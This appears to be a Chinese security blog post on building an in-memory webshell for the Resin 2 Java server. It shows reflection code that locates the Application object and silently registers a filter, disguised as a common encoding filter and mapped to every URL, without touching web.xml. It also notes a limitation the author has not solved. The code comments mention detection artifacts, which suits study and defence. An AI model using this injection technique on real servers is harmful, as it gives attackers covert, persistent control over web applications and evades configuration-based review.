Java安全之Resin2内存马( 二 )


//设置搜索类型包含ServletRequest,RequstGroup,Request...等关键字的对象List<Keyword> keys = new ArrayList();keys.add(new Keyword.Builder().setField_type("Request").build());keys.add(new Keyword.Builder().setField_type("Application").build());//新建一个广度优先搜索Thread.currentThread()的搜索器SearchRequstByBFS searcher = new SearchRequstByBFS(Thread.currentThread(),keys);//打开调试模式searcher.setIs_debug(true);//挖掘深度为20searcher.setMax_search_depth(20);//设置报告保存位置searcher.setReport_save_path("/tmp/");searcher.searchObject();result
# Request
TargetObject = {java.lang.Thread}
---> target = {com.caucho.server.TcpConnection}
---> request = {com.caucho.server.http.HttpRequest}
# Application
TargetObject = {java.lang.Thread}
---> contextClassLoader = {com.caucho.java.CompilingClassLoader}
---> attributes = {java.util.Hashtable}
---> attributes = {com.caucho.server.http.Application}


拿到 Application 对象之后，直接通过反射向其内部的 filter 注册结构（_filterMap、_filterList、_filters）中添加一个新的 Filter 即可。
主要代码
/*
 * Registers a Filter into the running Resin 2 Application purely via reflection,
 * without touching web.xml. This is an in-memory webshell ("memory shell") primitive.
 *
 * Relies on static members defined elsewhere in the file: APPLICATION (the
 * com.caucho.server.http.Application instance found by getApplication()),
 * filterName, and the helpers getClazz()/getFV() (class lookup and private-field read;
 * presumably reflection wrappers — not shown here).
 *
 * Defender's note: everything this method writes ends up in three private
 * collections of Application — _filterMap, _filterList and _filters — so a filter
 * present there that is NOT declared in web.xml is the artifact to look for. The
 * "CharacterEncodingFilter-<nanoTime>" name is a disguise, not a real Resin/Spring filter.
 */
private static void doInject(){
    // Random suffix avoids collisions on repeated injection; the prefix mimics a
    // common, legitimate filter name so it does not stand out in a listing.
    filterName = "CharacterEncodingFilter-" + System.nanoTime();
    try {
        if (APPLICATION !=null){
            // Regexp — earlier attempt at building the URL pattern by hand, left disabled by the author.
            //Class RegexpClazz = getClazz("com.caucho.regexp.Regexp");
            //Constructor RegexpConstructor = RegexpClazz.getDeclaredConstructor(String.class);
            //Object regexpObj = RegexpConstructor.newInstance("^(?=/)|^$");

            // QFilterConfig: (Application, filterName, filterClassName, RegistryNode).
            // "HiganbanaFilter" is the Filter class that will actually run; it must be
            // loadable by the application's class loader (assumed already present — not shown here).
            Class QFilterConfigclazz = getClazz("com.caucho.server.http.QFilterConfig");
            Constructor QFilterConfigConstructor = QFilterConfigclazz.getDeclaredConstructor(getClazz("com.caucho.server.http.Application"), String.class, String.class, getClazz("com.caucho.util.RegistryNode"));
            QFilterConfigConstructor.setAccessible(true);
            Object QFilterConfigObj = QFilterConfigConstructor.newInstance(APPLICATION, filterName, "HiganbanaFilter", null);

            // FilterMap: the URL-pattern -> filter-config mapping entry.
            Class filterMapClazz = getClazz("com.caucho.server.http.FilterMap");
            Constructor filterMapConstructor = filterMapClazz.getDeclaredConstructor();
            filterMapConstructor.setAccessible(true);
            Object filterMap = filterMapConstructor.newInstance();

            // set FilterMap regexp — "/*" means the filter intercepts every request path.
            Method setRegexpMethod = filterMap.getClass().getDeclaredMethod("setURLPattern", String.class, String.class);
            setRegexpMethod.setAccessible(true);
            setRegexpMethod.invoke(filterMap,"/*", null);

            // set FilterMap data — attach the filter config to the mapping.
            Method setDataMethod = filterMap.getClass().getDeclaredMethod("setData", Object.class);
            setDataMethod.setAccessible(true);
            setDataMethod.invoke(filterMap,QFilterConfigObj);

            // add FilterMap 2 _filterMap — private field of Application, read via getFV().
            ArrayList _filterMap = (ArrayList) getFV(APPLICATION, "_filterMap");
            _filterMap.add(filterMap);

            // add QFilterConfig 2 _filterList
            ArrayList _filterList = (ArrayList) getFV(APPLICATION, "_filterList");
            _filterList.add(QFilterConfigObj);

            // put QFilterConfig 2 _filters — keyed by the (disguised) filter name.
            Hashtable _filters = (Hashtable) getFV(APPLICATION, "_filters");
            _filters.put(filterName, QFilterConfigObj);
        }
    } catch (Exception e) {
        // NOTE(review): every reflective failure (missing class, changed constructor
        // signature, field rename) is swallowed here, so a failed injection is silent.
        // The author also reports (text below) that the filter only takes effect when
        // web.xml already declares at least one filter — this catch would hide that too.
    }
}

/*
 * Locates the Application object and stores it in APPLICATION.
 *
 * Follows the reference path reported by the BFS search above:
 * Thread.currentThread() -> contextClassLoader (CompilingClassLoader)
 *   -> private "attributes" Hashtable -> "caucho.application" entry.
 * Must run on a thread whose context class loader is the web application's loader
 * (e.g. the request-handling thread); otherwise the attribute is not there.
 */
private static void getApplication(){
    Thread thread = Thread.currentThread();
    ClassLoader contextClassLoader = thread.getContextClassLoader();
    // "attributes" is a private field of the Resin class loader; getFV() reads it reflectively.
    Hashtable attributesObj1 = (Hashtable) getFV(contextClassLoader,"attributes");
    APPLICATION = attributesObj1.get("caucho.application");
}
但是有个弊端,debug逻辑的时候发现,只有在当前web.xml中已经存在有filter才能添加进去 。暂未解决该问题 。
以上就是项目中遇到的一个比较有趣且比较极端的问题：只有 web.xml 中已经声明过 filter 时，反射注入的 filter 才会生效，目前的做法也算不上很好的解决方案。
